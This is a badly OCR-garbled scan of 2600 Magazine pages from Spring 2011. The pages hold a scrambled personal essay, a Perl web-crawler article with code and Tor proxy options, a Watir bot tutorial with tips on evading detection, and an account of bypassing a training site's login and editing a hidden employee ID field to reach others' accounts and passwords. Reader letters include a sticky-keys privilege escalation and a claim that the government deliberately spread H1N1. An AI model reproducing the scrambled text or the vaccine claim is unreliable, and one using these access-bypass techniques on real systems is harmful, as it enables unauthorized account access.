source. I began to build my own remotes into the scripts. I had little in common with my neighbors and was extremely shy in person. J kept trying new things instead. At least. the marriage part of the deal Willi over just months later and ( found myself starting college at the age of 3O-something with throe kids. which is wben 1 joined the amazing ranks of fast food. In 00 time at aJJ. Indiana with her three children . Then I tried more daring channel scripts and group scripts. 1suppose my life has been a series of little adventures that lead to new obsessions and new knowledge." One of her favorite 10 inform others on how 10 use the Internet and their computer systems in ways IMt can not only inform and educate. While this was going on. utilize it. bUI as I had been home with my children for nearly a decade." images of some poor schmuck living I was given a rebuilt PC for the house and a 56k in his parents' basement wearing Vulcan ears come to mind.. My first act was to add RAM. I suppose I should blame Bufty the Vampire Slayer for ihar one. Building webshes.. fast food was all I could find when my husband lost his job. along with help from my husband.:dM Spring 2011 Page 27 . But of course. But I'd made a deal with my husband. bUI it was just accepted as normal when I'd explain programs 10 family. kind of irritating for me. mIRe and the miracle of " wildfeed" became the answer. fix it. I would have been able lO opt into computer classes that are now offered starting at elementary levels these days. My start in this world came by necessity. so I looked it up and did il myself. ~can clearly recall the first time I had to unhook aJJ the wires and slide the side of the case off. I didn't. And while these make for great characters in movies and on television. I had hoped thaI I could rely 00 some financial aid through the state and federal grants. I'm just 3 single motherof three who doesn't take my PC to The Geek Squad wben it breaks. il was the only real alternative since my cable company refused 10 carry the UPN station. I've looked up so many things online thar IOSI some pQOI" plumber or mechanic a job. from the hardware to the operating system and software. the things you are often forced to learn. lleamed about free software and firewalls. but I still loved having my own computer. Ir's funny. I was so worried I'd break the machine. I still don 't know if I really qualify as a hacker. adding designs and colors. After that.r well.. Unfortunately. So began my real education. although they aren't 100 pleased with the fact that I'm building an Intranet !hat will 001 onJy limit their Internee surfing for my peace of mind. and maybe even improve and share il with others who love 10 break the unbreakable and fix the unfixable. I was left to my own devices while most of the neighbors and my husband went to work. r was always pretty handy with new software when my parents needed to get a home computer. DO matter wbere 1went on the Internet. crack it.~- The Hacker Pe~speitil bv Katherine Cook . Jt was. As I stayed home and became used to the routine of a housewife. really. and it scared the you-know-what out of me. I could nOI take the monotony and the belligerence of rode customers for barely minimum wage and decided it was time to go back to school. but we didn't gel UPN for the current season. of course. These last few years have been the happiest of my life. Page 2 6 . I worked menial jobs and didn't even have access 10 a computer again until I was in my early 20s. but. At the time 1 enrolled. budget-minded mother. I liked the reruns on FX. I ended up providing more customer service for feUow customers than 1 got from the so called "experts. So. the idea of taking this natural proclivity and making it a career didn't even really cross anyone's mind. Internet connection.. Speaking of'whicb. By the rime I was in high school. Within two years. so I had to find alternate viewing choices. She writes for a . My boyfriend is the one who said I should tell my story." But when asked. I was to stay horne with the kids at least until they were all in school themselves. The one thing that always seemed to hold true. embrace it. This was it: the gateway to a soclal life. simply bocause you have no alternative.- 2600 Mago. they hardly represent the plethora of individuals who simply utilize the technology and information available in ways that "the normals" don't quite understand. I moved out of my parents' house just months after graduating. What really fascinated me was the desktop. was that I was surrounded by males.

1\ is Perl and it is easy (0 understand. 10 show you the spider.Preparation for HOPE Number Nine is now underway for Summer 2012! ~tftMSp. they gave me no code... it will slart at the top of the searchdata.txt lis! if it is stopped for any problems. calling the URL. All of my levels used the same warhead which made il easy to watch for You CAN BE PART OF THE PLANNING FOR OUR NEXT CONFERENCE IN NEW YORK CITY BY JOlNING THE ONLINE DISCUSSION... men by all means make: il run your way. Once the ll1TIIy is tilled with URis. DOW it's lime launch the spider. One thing 10 remember is to leave a space at the top of the URL list.'0 researchers from the University of Chicago.net) have topics on everything from infrastructure to art. Again.txt laws... With what r read and what I researched. very long run. I did go 10 three levels and il worked very well. OIL I had 3000 URI. boping I would run across the article by mistake one day. this array is used (0 feed the spider URLs 10 keep the spider crawling. I want to StI\.. Saying that. Truth is.'U that this is just a leaching article whicb is why I took OUI any of the scripts that might be used for malicious purposes. I gOI me a good lesson in Reg)( and Perl. and seeing if WC gCI a response. it can be set up 10 run a second level warhead and strip Iiaks off lhe second level URl. Now.hope net! Page 28---------------. I read in 2005 a PllD paper thlll was wrinen by (\1. or start your own discussion thread problems. I did not know Perl nor did I know bow 10 build spiders (or web crawlers if you will). So if you sec some variables and can 't find them on the code. Figure I will show you the setup of the URL feeding file for Level One. As always. Tbat was in 2005 and I think the paper was written in 1998 (give or take a year) . Make sure yoo have !be spider. then the spider strips the links off the lim page and stores. I don't know wby .txt.. Figure 2 shows the sian of the spider run. ( will surely let them know. I f you have a third layer. The links il used on the large! page have been replaced by most high level web developers with Javascript.pl and scarchdsta. it could be " hours before il comes back to the ammo dump and grabs another home URL. The HOPE Forums (talk. I am showing you Level Two very scaled down. This area uses Perl libraries (LWP::UscrAgeol) 10 SCi up !he spider. by Triad@Efnet Let me say this: the idea for the spider is nOI mine. If (1j]JI contacted by them. I looked for hours for that PDF tile thai taught me about this spider. u r l . url. and much more! Come and share ideas for talks. 1 also wish 10 apologize 10 the !'No researchers who gave me the framework so I could give them their ngblly dues for their article. Any URL you want C3.hope. this tile is dosed and no! used again unless the spider is stopped and restarted. Again. it just works that way. This file is loaded WIth URLs thai are used one 51 5 time: for processing and stripping links for the level two warhead processing. This must be in a separate file witb spider. If you find il difTen:tI!.. Truth is. look al the URL.com h ttp : //ur l . especially if you know Perl (you will note that ruse Perl like Basic). The next section is the spider/ageol setup area. Another thing 10say is 10 always use good spider/crawler practices and abide by the site's robot. Figure I: h t tp ://sla t e .txt also in the same httpstttalk.. the tlrsl thing you see are the variables.2600 Magazine Spring 2011 . the spider weapon is mosLly obsoIete. Most of the spider's lime will be spent in searching the stripped links. com . The (\1. So it is lime to retire lhe main weapon used on the spider. Like the researchers. II Deeds 10 begin with http://. I am paning il DOW and it should be a breeze because ActivePcrl emulates Linux Perl effectively. II then releases the warhead 00 the first page and does wbat it's supposed 10 do (looking for certain data.rxt file can have any URL in il bUI il has 10 be in a certain fon:nat for !he Hnp::RequcsI. In the next section. ( jU~1 plucked (lUI the warhead scripts and eliminated variables and scaled down Level Two. Level Two uses an array thai was f lied WIth the links from stripping links off the Level One page . lXl flle in the same directory or you'll gel one of my colorful error texts. The one thing I can say is that the code is mine. find out how to volunteer. But they did give me one clue and thai was thaI il was made from Perl. r built !he weapon aod it works· and il works good. the spider begins by grabbing a URL from the array and then using sorne routines from the Perl libraries. DoO'1 throw rocks at IDC yet I just didn't \mow Linux at thai lime.Il be listed. Stripping links off pages and running the warhead scripts 00 the llnks in two 10 three levels can lake a very. The searchdata. This is because there is OD]y one home page and il cao have 1-500 links to oth. The researchers gave me the idea and the framework and I did the coding and made the spider worll. If so. or rather the weapon involved ~ now mostly outdated.lXt sbould be ~I up with one space at the lOP anti one line in between. The $file variable is used to load the searchdata. then Level Two begins its job. I wiII not give you the weapon code. \' pages . Looking 31 tbe code from the lop. ADd again.. They called this spider a weapon and would nOI give the code.rwillieave you with a few examples in Figure I. The next section is for loading the URLs from searcbdata. But I will give you the spider code. The code is mine. Most variables used in me warheads an: gone eo make the spider faster and more efficient.pl and the searchdata. OK. r also wam to say thai chis prngrarn was wrinen in Windows Perl (Activef'erl).s in my searchdaia. 1 have never seen the end of the file. The spider will DOt work if the agent libraries are not listed. il probably was used 1lO the warhead. Don't blame the spider right otT. The code is also commented very well. lfthc spider fails in the middle of a run. CK.s and create a mird level warhead. This is used as an ammuninOD dump for the warhead..P a g e 29 . So.'0 files J will give you arc the spider framework and !he searchdau.This is how me searchdlIla. II probably has something wrong in the URL thai the spider doesn't like. keynote speakers to workshops and projects. lock picking to Segways.txt file.).ls and Level 2 URLs and what the beginning of a run will look like.rxt. When Level One is complete. Good Luck.. showiog Level I l/R. I have been looking for it for years and Malty (jUS! gave up.

sleep(10). #uses $x for indexing print "-. if ($response->is_success) {#bb sleep(2). code had 5. #$counter++..xxxxx. Sua = new LWP::UserAgent.. etc push(@links. #Level I index my $a=O.. push(@harvestedURLs. $sizeofharvestedURLs = $#harvestedURLs. # ** End LINK STRIPPING ** # Here is where you set up for a run on home page # }#bb# LVL 2 BEGIN ****************************** while($c <= $sizeoflinks ) (#xxx $ur12 = $links[$c++].Level I . I put in 5 $ua->agent('Mozilla!4.$url\n\n". #reset level 2 Slinks variable $x++. } #endif () while«A» ( $input=<A>. # These are fake URLs . my $url = "". my $input = 0.Triad # Updated June 19 2010 .edu/ Level 2 STRIPPED url http://www.from the Level one URL. # Tag to strip <a>. # Used to slow down for TOR $p->parse($response->content) .# TOR CAN ALSO BE USED AND .url.com/ http://www. my $base = $response->base. $file = ·searchdata. #Level II my @links = ().url. use HTML::LinkExtor.abc. $req = new HTTP::Request GET => $harvestedURLs[$x]. # $ua->proxy(http => 'http://127. <img>. my $b=O. #print "@links". \n\n·. # TOR TOR TOR $ua->from(. if (open(A.url. print "Seed URL's = $sizeofharvestedURLs\n\n".75').0. http://13.cn/id/2257378/ . 2008 -.. print ·Level 2 STRIPPED URL\n\n·. my $c=O. sleep(2). use URI: :URL.Triad ################################################################ Page 30 2600 Magazine Spring 2011 Page 31 .).url. my $z=O.Triad # Update Apr. 01. exit (-1) . Ex. values %attr).2010 . print ·$ur12\n".29. ·$file·) == undef) { return ( print ·\n\n\nSHIT !!! Cannot open the file: ( \n\n\n"). my $d=O. #Level I my $ur12 = "n. #Level II index my $p = HTML: :LinkExtor->new(\&callback).txt n .#stripped links array my $sizeoflinks = 0. my $sizofharvestedURLs = 0.IT IS EXPLAINED IN THE CODE.url. #not sure of this number. #used to index thru FORMS on page my $q=O. #----------------Load URL's array with links -------------------print "\n\n******** Loading URL's *******\n\n".url.www. # spider. return if Stag ne 'a'.Home Page -. %attr) = @_. my $sizeofinput = 0.( I hope you see this :) Level 2 STRIPPED url http:// -www.Home Page -..Level I -. #DOT. Level 2 STRIPPED ur1 . #print "$counter\n". } #endwhile () close (A).http://slate. .# The last 3 URLs were stripped .COMS from searchdata. # test point for link stripping $sizeoflinks = $#links.pl #TDM 2005 my $x=O.com. } @links. $response = $ua->request($req).".directories. #used on the FORM FILL Area on $sizeofharvestedURls index my $y=O. #Used to input data from files my @harvestedULs = (). $base)->abs.edu Figure 2: ******** Loading URL's ******* Seed URL's = 3 Begin Spider run -. sleep(l).com!view!2057067! ########################### Begin Spider ############################### print ·\n\n Begin Spider run . my $e=O. #999 End sub callback #-----------------------------------------------------# TDM 2005 # Updated Feb.0. $ua->timeout(5). # makes sure that @array is empty }#aa Exit Level 1 ######################### END Spider ########################### #******************** LVL 2 - #----------------------Link Stripping Sub-Routine--------------sub callback ( #999 my($tag.. my $counter = 0. while($x <= $sizeofharvestedURLs) {#aa #Loop for harvestedURLs $url = $harvestedURLs[$x]. #used to let array to settle in LINK STRIPPING ** @links = map { $_ = url($_. #used to slow down for viewing the spider operation #****************** # Enter into level 3 # # # Exiting Level 3 # # Here is where you set up for a run on Level 2 # }#xxx Exit Level 2 END ***** $c = 0.l:8118'). $input). # Used on $harvestedURLs[$x] @links = ..txt file Set up Agent -----------------------------require LWP::UserAgent. # used to sow down for TOR.

If] was to start guessing user names and passwords." Tom Smith 's was 127. or Rubylnslaller with the DevKit 00 Windows. buc the possibilities are endless. Then I entered an email address from ht t p : / /1 0 mlnu t e ma i l . Each site aclS differently. Srill nothing.click s lee p 1 un t i l L. like sleeping at certain points and waiting ror some teJ:1 to appear on the page. tel<t-neld ( : narne . wait some more. ['II leave il up Ul you as 10 jusl how mischievous you wanl W be. l»J1 support is pretty thin. What did I get when the email arrived? Uscrname: sysadmin and password: sysadrnm. you can't use a normal booknlaJiL You can use Watir W open up the page for you Ibough. set . FireFox add-oos (0 th~ rescue! I was able to .i. li nk . those usually OIIly appear 00 registration forms. I'm using Firef'ox 011 a Linux box.. BoIS often try to hide themselves by passing realistic user agents and other headers. : Br o ws er . all il did was bring you back to the home page. SafariWatir. Now. "View Source" isn'l going to work here. . This is referred to as "AJAX. But. com/ . Using Watir for bois will woo 011 any site. Writing "bots" for crawling or manipulating websites used to be 8$ simple as requesting HTML pages from a web server and parsing the HIMC..:d. Java or Silverlighl. Most people had kept their default user oamc and password. Many sites provide an API for you 10 usc.. So.. 'd igg' : _c ~ icl< Youcan sec here why this can be so oicky . I fouod 3 number ofsecurily problems.. and Watir-WebdJiver) can coo rro I all !he major browsers. ( needed a way 10 cbange the: VBScripl to JavaScript for my lISe. There are also some libraries around thaI can read these. they're usually purpose-built for certain sites and won 't work on the really good ones anyway. Once you gel up and running. I would bave gotten ill and il would have only taken a few minutes. I still senI lhe site designer an email informing him of the issue.text. 'storY-item' l . When I logged in as myself. I had been pushing for my department co start going web-based. Trial and error is in order here rod you'll gel a feel for when waiLing is needed. Instead of trying W integrate JavaScript into your bot. However. or Chrome. but il did the job.. 00 maner how much obfuscation and COuntemJC3SUJ'eS they use. and sometimes you just have to Page 32 2600 Magazine Spring 2011 . there was a hidden variable called "ernployeeid. If ic is being uscd. Allbaugh I was hoping 10 design the site myself and has I it locally. My job requires constant training. a sue. Let's open up digq . I think VBScripl is great for automating things on a Windows machine. bUI bec:aWlC they use JavaScript aod POST requests and other uo-bookroarkable things.com' b . there's very little they can do 10 stop these bots. .. anyone wbo figured out whal ( did would have a = to their email accounts. They were using VBScripl. . VBSenpi should nOI be used 00 a web page. ( felt bad for Tom Smith. They were just giving the illusion of security.... Muchief We've been danciog around this subject for the enl~ aniele..P a g e 3 3 try putting in different wail times and looking for differeol teXI to show up in the body.divsl :class. a s p. There are some projects such as ftasbwarir 10 solve this.. Fircfox with Firebug. this may or may nOI be a problem. 'Top News') . With just this short intro . I could also see everyone 's email addresses Md p3$Swords. I typed in my user name and password. To login. Nothing bas been dooe yel and it has been week5. requ ire ' r ubygems ' requ ire 'watir-webdriver' b = Watir: : Browser. BUI I later found OUI that ic was not really his account. Knowing this. I was also hoping 10 rum them in the direction of open source and Linux at some point down the line.button( :name. c l i c k b .te x t-fie ld(:name. lf you were to dick "back. FireWatir.r equire 'rubygems' requ ire ' wa t i r .: it is loaded. go to the top news stories and di gg the top one. 'ident' I .:asily change the YBScript to JavaSeript with the FireFox add-oo called Firebug. s e t ' Wa t l r ' b . I then went 10 the "I forgol my password" page and entered the fake email address. He replied quickly and told me thac be was aware of the issue and he was working on changing oul all of the VBScnpt.. by MJchaei Morin The things [ fouod wen: interesting. the ernployeeid variable was 52. or be parsed more carefully with libraries such 8$ Nokogiri . You just might find :lQmetbmg. Firebug allows you 10 ehange: the code of a page you are viL"Wing one. 'Q') . The whole thing was at my control. go to the top news. AI first. but you woo't need one. I clicked the login burton. ( received my user name and password. 11nk( :te xt . keep this in mind. Depending 00 thc sire. •• 011 the sit e and I -. I was hoping that using lighter weight web applications would help speed things up. / / t r a i n i nq s i te . You can use the site direclly. This still doesn't gel around CAPTCHAs (those annoying scrambled letters). Though if you're up lO something really miscbievous. I could install lnternet Explorer through Wine. Aside from the Jcajiggcring.by MctalxlOOO About fOUf months ago.text .is available on all major platforms and its various flavors (whicb include Watir. You can then WlC the gem command to install a flavor ofWalir.. '~assword' ) . That is right. BUI I had also noticed while looking at the code of the personal info page. Continuing with !he Digg =mple. 1f you can go there and click on these ihings yourself.go t o ·google.se t . So I decided to look at the page's source code.~ you would find yourself still logged in. I saw what the problem was right away. This is whal makes writing bots without JavaSaipl so hard these days. From this poinc on I'm going 10 refer 10 the site as http. . You can also sce some challenges in wriling boIS with Walir. you can usc Warir (pronounced "water"). Currently we're using FikMaker Pro on some not-roo-fast machines. That would be extrernety di fficult 10 detect. I had to find another way 10 gel this site 10 work for me. Watir won't work with other technologies embedded in the page such as Flash.button(. I connnued to look through the code made a preny long list. When designing a web page. com (like jl or not. unti I the first time I tried to log on to the site. I was constanlly having to look al the code and nnd workarounds. I now had the ability 10 change the site settings. wben you arc surfing the web. It just takes some kajiggcring. It 's pretty suspicious if'all aile user does is log in. (: t ext..we bdr i ve r ' b = Wa tlr . When you go to Digg and click Login. While doing this. be would replace the old code on the site. one of the maio goals should be to make it as compatible with as many web browsers as possible. I've often oied 10 bookmark things. c o m and submitted the form. and it'll spread the Ruby love without you lifting a finger. I fouod thaI if 1 posted a blank usa name and password. log in. and immediately vote the top link up. 'Login') . ' y o u r usern3Il1e' b . whal if you wanted lO aUlomatically digg any story with the word -Ruby· in tl1e title? Sec this to loop and watch Dew stories. my employer hired an out of state company 10 set up a website. ( fouod thaI a nwnber of the pages on the site ODce I logged in bad VBScripl in them. We arc required to meet a minimum number of training hours each year. By itself. He thanked me and lold me Ollce he looked them over. using Warir is pretty easy. I SCOI all this informaLion 10 my employer. you should be well on your wait to creating your own bots.. In about a minute." Nothing happened. Watu. However. It starte d OUI simply. Wnlp this up in your own API and il'lI be evCll easier to wrile yow own boISfor the sileo Aulomale common lasks." The server is returning new bils of HTML and the page is inserting them into the DOM l1ce. a Ruby library for controlling web browsers. 'Login ') . You can get snd store the enI ire text of a web page in its current state by using the "text" method. I full bad for Ibe few people who were sman enough to change their password Hopefully they know enough nol W usc the same password for their email alXOuots. Here arc some other things to think about. c l i c k That's nOl too exciting though. It only changes il in your browser for thaI one rime.link(: t ext. ' your pa s swo r d ' b. poke arouod. like Firefox 4. maybe you should throw Tor into the miJ:! . no web designer would use il on 3 web page. Wail random times 10 simulate reading. new :firefox b. which was the firllc lener of their first llalT1e and their lasl name (Example : ISmith) for both user name and password. c o m/ l o g in_ " reveri fy . il would belp the transition. Ul gel the site to work for me. the site designer most likely bas link knowledge on web deliigning and most likely jusl took some class so he could make a few bucks When you see VBScripl being us. This new website was designed to help us keep track of classes we need to take ali well ali the Dumber of hours we have already put into training.. Although I found 8 workarouod for myself. r recommend RYM on Linux or as X. Otherwise.. I had to post a usa name and password to http ://trainingsit e . He bas not changed a thing. I tried il again but entered "l " for the ernployeeid. If everything we used was web based. ThL"fI: was no real security Oil the site at all. but they Call be found by examining server logs.com' b. VBScripl only works in Internet Explorer... it would log me in asTorn Smith. They mayor may not work for you. You can hide a bot by having icacl more like a bUI1l3n.goto ·digg..cl i ck sleep 1 • Hay need ka j i g g e r i ng b . llLal was three mooths ago. it's easy to do. But.nc ~"de ? . bUI it uses a 101 of lavaS· en pi).. r rewrote the scripl for three of the pages and emai led them 10 the designer.. That is. I found thaI there were CWo Tom Smiths listed and the one I was able to access withoul a user name or paS. Here arc some ideas of what you can do with this. So I once again logged in to Tom Smith 's account and used J'lfl:bug to change the ernployecid variable 10 52. I found iI all blank. new :nrefox b. ' Login to Oigg' b . Another thing you'Il need is a browser with a good OOM inspector. Makesmart bco/t:mbrks.. This can be used 10 store entire pages for mirroring purposes. Provirk YOIl' own API/a. modem sites (or "web applications") often require JavaScripl to function. So. r hil "Enter..!word was not the real Tom Smith. Wben 1 went 10 his personal infa p3gc. I infonned my employer of the issues and I was lOld 10 make a list and email illO them. You'll need a worlOng Ruby installation ~th C compiler. BUI I was not about to do thal Wrth the option of using lnternet Explorer otfthe table. you geL a new login form in lhe middle ofllle page ~c wasn'l part oflM original HTML returned by the firsl HITP request. l noticed that when you clicked the logout bunon at the top of the page. click on other liaks (thai it malces sense to click Oil). However. fir s t . I was still happy 10 sec us heading in that direction. 'btnG') . then perform dle task needed.t ext-neld( :name. This example program will open up Google and search for -Watir.

though (in Colorado at least). FIrst of all. BUI. we 're tempted 10 just dismiss the entire thing as mere television tha: shouldn't matter so much . However. and determining how much you pay. meanwhile. red light. It was $625 with 6j percent Florida sales tax which brought the total 10 $6. we believe Amazon is as secure as any other such online service . a deal was struck . nor a lamer. an often-discussed topic in the hacker community is the reason for hacking .. in a final insult. I'd happily buy that. so every bit of that from our readers is extremely important. the only other thing you have to worry about are utilities as there 's no way around not giving them a physical address.gov. physical or sexual abuse.which you alluded UJ . giving the physical address of the post office when requested.. I've also had driver licenses with "General Delivery. gui Just because the story rook place in the past. Besides that. software modding. SO it works nicely . One time I had my PO box clearly listed on both my driver license and registration. I have to warn you that even though you put your mailing address as General Delivery or wherever you want mail.P a g e 35 . I'm not too sure about Amazon. but can't remember which issue it's in. A 2600 subscription is simply not something you can walk away from . Kentucky. why would it be 100 late for you 10 gel involved in the hacker world? If you read PlaIO. the district's IT administration made changes so that only they would be able to do certain administrative tasks . the issue here is the lack of IT support when necessary. As for the digital edition. They also give you a laminated ID card that proves you're in the program. I was a little paranoid at first.. a certain piece of USB hardware had to be installed. Penetration testing . Other tricks for when physical addresses are required include renting a UPS Store mailbox. and I give them a UPS store mailing address 10 re-send the mail to . In New York.. is likely the only time our film will ever be compared to Plato and Shakespeare. To use the Lego robotics . the terms were kepi secret from all of the people who were inconvenienced by all of this nonsense. That documentary really woke me up to life .66.. Banks also must accept it under a AN/CEN ruling . facebook . there was recently a "war " between Cable vision and Fox .." tickets from them will be addressed to. but now neither the teachers nor the on-site computer lab instructor had the permissions to install drivers . Colorado.. We are also envious here in N~ York where we den 'I gel 10 pay sales tax on reading material. sometimes hacking can be useful and sometimes it can be like throwing a brick in a window. incidentally. and entire broadcasting networks. supporting our efforts help make it all possible in the first place. are you 100 late 10 become interested in philosophy? Would reading a Shakespeare play make you feel like you missed out on all the fun? (This. we'll let the world know . Fox refused to send the signal to Cablevision and its channels were then replaced with Cablevision propaganda announcements worthy of the Cold War. I had written an article about this a long time ago. I thought you might find that interesting. at the DMV there is no need to provide a physical address if you're homeless. In the end.just as you had the Cablevision deal up there . Gelling involved because of something in the past is a great way 10 create a nifty future. blacklisted lhe IPs of Cab levis ion subscribers attempting to obtain Fox programming online. speed. I also wanted to tell you how excited I am about the new digital edition of your prestigious magazine. City. as sometimes I remember reading an article. But the bad thing is I just watched it yesterday which makes me too damn late. it should be the consumer who decides what content lhey wish 10 have access 10 and lhey ought 10 be able 10 shop around for the best price. there :s a lot 10 learn from what happened in the film and much that can be applied 10 the world of today. [ recently came across a situation where a quick privilege escalation allowed schoolchildren to use their Lego robotics soft ware despite restrictions placed by the district. Add 10 this the fact that they also control newspapers. CA 90210. Just write in "transient" on the residential address portion. and every state and local government official must accept it in place of the actual residential address. Check out hnp :/Iacp. Our goal is always 10 go with the DRM-Jree option. So my dad Page 34 2600 Magazine Spring 2011 . CA 91743" and "General Delivery. so far. magazines. how you access the lntemet. ZIP" where city is that of the mailing address.colorado. Guasti . is that most utilities accept ACP and put your utilities in a fake name while keeping your real info in a secure department that only has it stored in a folder somewhere in case you default on the bill and they have to come after you for nonpayment . if you've ever been a victim of stalking (I have) . they gel the UPS mail drop address. When all of your mail is going to one of these drops . WTL We're working on all sorts of options and varieties and we appreciate the feedback. many of these are " registered CMRA" addresses and will be flagged in computer systems as a mail drop . all the while expecting you ro be sympathetic 10 the ir disputes with other corporate giants . Fun Facts Dear 2600: I purchased a 2600 today from Barnes and Noble. Fox .. I've also used General Delivery for extensive periods of time for all of my mail when I was living in Arkansas with no utilities in my name.where lhe Fox network was taken off the Cablevision system due 10 a dispute over fees . Some "mom and pop" shops are not registered and you can use that as physical. and toll road cameras apparently have access to your residential address and. Now. Some fun these corporation have. "N Physical Address. if you write in "transient. As past issues have discussed. I can understand keeping students and inept teachers from accidentally causing problems. yet a toll notice came to the "N Physical Address" which was entered as the physical in the DMV's system. however.yes. In the meantime.\ J Gratitude Dear 2600: First. in my experience.comlrequestpassword . and their control can rival that of the most oppressive governments in any parr of the world. Other alternatives. Lucky 225 Dear 2600: As you know. information gathering. this is my actual URL) . Dear 2601J: Just a quick note to say thank you for putting out Volume 26 as a DRM-free PDF file . Recently.If we learn otherwise. computer learning.. I would also love back issues as PDFs. I saw a TV commercial warning that Time WarnerCable is going to lose the Fox channel (the freeTV channel). I just wanted to thank you for finding my new address and updating it when I failed to tell you that I moved. but then realized the post office more then likely was responsible for the update. however I do wish you had a secure download web server. rOWnl We are quite relentless in tracking down subscribers who have either moved or escaped. They give me a physical address for mail. Dear 2601J: I thought you might find it interesting that here in Lexington. Not a hacker. Dear 2600: I'm a Brazilian guy called Guilherroe. We will continue 10 keep people informed at every step so thai you know where it all stands . I bought it today and am very pleased! I'd like to say that if you have an option for the paper magazine and PDF. However. State. My dad is an elementary school teacher and teaches Lego Mindstorrns robotics to his fifth grade class . not a cracker. Somehow. you can see if there is a PMB designator that will give away that it's a private mailbox. and use searchbug to verify the address. In the end. has the best and I moved here just because of their program. bUI it's been lost in the vast Internet somewhere and I'd just like to add my experiences with using this service . I write this because I wanted to thank you for the documentary Freedom DOWTItime. and other things can all be positive aspects of hacking. however. The good thing. IntemeffougbGuy We do find it interesting and we 've received all kinds of pictures of receipts from people in Florida (as well as some other places) wilh this amusing fact. that is at best a fantasy. after consumers wound up missing a good pari of the World Series due 10this corporate spat . my issue of 2600 found its way to my new address with the correct address label and such . If you look through the phone book. right? Nathan II just goes 10 show why these corporations should never be trusted with more than their own J \ Dear 26f)(): I just got my Winter 2010-2011 issue of 2600 (27 :4) and read the article about General Delivery. but sometimes we run i1l/0 snags with various vendors who don 't support this . operations.) The point is. or harassment include Address Confidentiality Progrnms . For the rest of the private entities that won 't accept it." A picture of one such ID card can be found on my Facebook (http://www. Righi now. But consider the control that these corporate giants have over what you can an4 can't see. Beverly Hills.

this was my area of interest. Incredible and shocking things can be discovered if everything is questioned through investigations and leaked documents .) We await the day when a cell phone company takes it upon itself to use some more bandwidth and dramatically improve the sound ofthe audio : With all of the things "smart phones" can tUJ today. if it gets through. When investigating anything of this nature. press 7 to block lnmate calls. If I am paying by debit. Our kids will become slaves psychologically andlor economically if we don't protect our country. bUI someone doesn't want people to know the truth . It is then verified by automated dialer. adults and children than during a regular flu season. but somebody has 10 show these bastards how to use it . we do try .. it's incredible that making a simple phone call sound as good as it would have 30 years ago is beyond their reach . the truth will remain hidden . I want 10 thank you for being exactly what you stand for. We will not apologize that our fingers are not up 10 the same texting speed as our teenagers. Evan K. While I know you don't expect to profit off of your kind act. Without even logging in. Anachronistically yours. We'd be happy to spread information on this and other positive prison projects . and not for selfish gain. you should have no trouble learning about any new developments. government infected and killed innocent people worldwide. I get out in ten months..gtI.. I gOI my hands on a few zines that a guy Joe ordered . The 2600 crew did a stand-up thing.S. because of the HINI. I could not believe it. On top of gening your mag. LeI me back up. I wrote a month and a half ago while I was in another prison. But if questioning the questioners is discouraged. I dial for complaint *1995. the United States Constitution . net. So would you send me a 2600 and. lt is not currently on the banned books list. I think there were 47 million Americans who were sick from it and the COC estimated last year that 60 million people were vaccinated in the U. and my assumption was correct. The authorities simply love recidivism . tlying and driving allover the West. We've left out any idennfying information as we weren 't sure you wanted to give thai out . HOPE 2012. My problem is that the rates for phone calls through the monopoly phone company are so expensive thar money is most likely a contributing cause for my continued unlawful detainment. Last attorney bailed out on me a month before my September 16th sentencing date "under seal" and the warden is retaliating against my First AmendmentlUDHR Article 19 rights by denying media direct access to me. 9 is not avail- Page 3 6 . listening 10 the clicks. Peter Thanks for forwarding this along to us. As we all know. and the Universal Declaration of Human Rights . but I was able to use a well documented nick using BackTrack.k. hanging on the wall. and the only phone that answers when someone else calls. (Obviously. As I was saying before when I was handed six issues of 2600 mag. The rotary phone is crystal clear sounding. Apparently the USP· TO removed or renamed the application number (60/966724) because this document was found and people started preaching about it. I forgot bow 10 really feel anything but hale for others. I figured it would be easy enough to give my dad admin privileges on an XP machine. even if it is only 10 shout at the computerized voice of a collection agency calling the house for someone who doesn't live here. Internally. there were five times more deaths in young interested) and would like to get 2600 sent to me.- 2600 Magazine Spring 2011 Page 37 . This amount of lime would lead one 10 believe I did something extremely violent. I just wanted 10 leI you know that I have utilized this position 10 reach 1300 inmates with the Linux gospel. even though it does not ring. the sovereignty that was rightfully given 10 us and secured to us by lhe Declaration of Independence. if enough attention is brought to it. The support we get from our readers and subscribers helps to make thai possible . I was able 10 secure a very fulfilling job with the Prison News Magazine. Far too many people fail into this trap and they wind up dis regarding any inconvenient fa cts that don't support their theories. thick. when it would be simpler just 10 confirm plans with a five minute or less phone call. The name of the phone company is Global TelLink . you 'll learn far more if you haven't reached your conclusion s before doing the research. the fact that it's a rotary phone has no bearing on this.. And. enclosed are the patents for the HI N 1 "swine flu" vaccine. About talking with a speaker and microphone that actually have some clarity to them. This is something we could a// benefit from . then add the number that I want to call 10 the allow list. Both the article and the publication impressed everyone here. The two cordless phones we use sbould have skipped us altogether and gone straight to the landfiU . The highlight of the vaccine patent is the filing date of 8/2812007 and publishing date of 3/512009. We have finally weaponized data.s is accountability for a govemment that lies and deceives. Then. The most basic methods had been disabled. 0ear26OO: I am now being detained in an institution (an injustice that I would go on about if anyone is Dear 2600: I've done 19 months in the bucket and still have no sentencing date. We're not going to get into a whole back and forth here. then lied about it. Before I got locked up. WWJAD? The whole point of WikiLea. and once freedom of speech is censored and regulated. That's what happens when you keep your mouth sbut and follow lhe code. once allowed. I wonder what Julian Assange would do in a situation like this. Oh well. I would like to contribute in the next year or so. I call and you get the option to press 9 for rate info. One of my favorite things is when articles are facilitated using tools in Linux. but that some basic script kiddie knowledge can come in handy from time to time. only to come out 100 percent competent each time. but it could send my way due to my lack of funds at the moment. I asked your crew if you had any extras that you am rambling. that's life. With great power comes great responsibility. I am now on 24-hour lockdown. I hope the EFF are planning to try to repeal this FCC regulation of the net. except to my that evidence is rarely this simple and clearcut . The pbone number for "help" is 800·231 · 0193. so it was not obtained in any ill-faith. Dear 2600: I am an inmate in Kansas. for debit/prepay it's 877-372-4330 . Ghost Exodus As always. all for free! I am currently incarcerated for some dumb decisions. but demonstrates the merits of being able to take matters into one's own hands wben the people in charge can't be relied upon. We theoretically hold the spear of destiny.www. I has also never been reviewed either. and replaced "sticky keys" with a command prompt at system level. Justin & Audrey Cincinnati. Anyways. and expect us to text back." This is a very simple trick that isn't going to impress anybody reading. Not 10 mention that if each vaccine shot costs the consumer $15. While you may have been absent from the hacker community for a while. In all these years. I got three nonperson felonies that ran back to back. someone will find a reason to ban it. except for the person on the other end who is calling from a cell. I simply booted from my flash drive (which attracted much student attention since I bad case modded my drive by sticking it in a broken Pokemon Red cartridge). I pursued the ability to seek truth at any 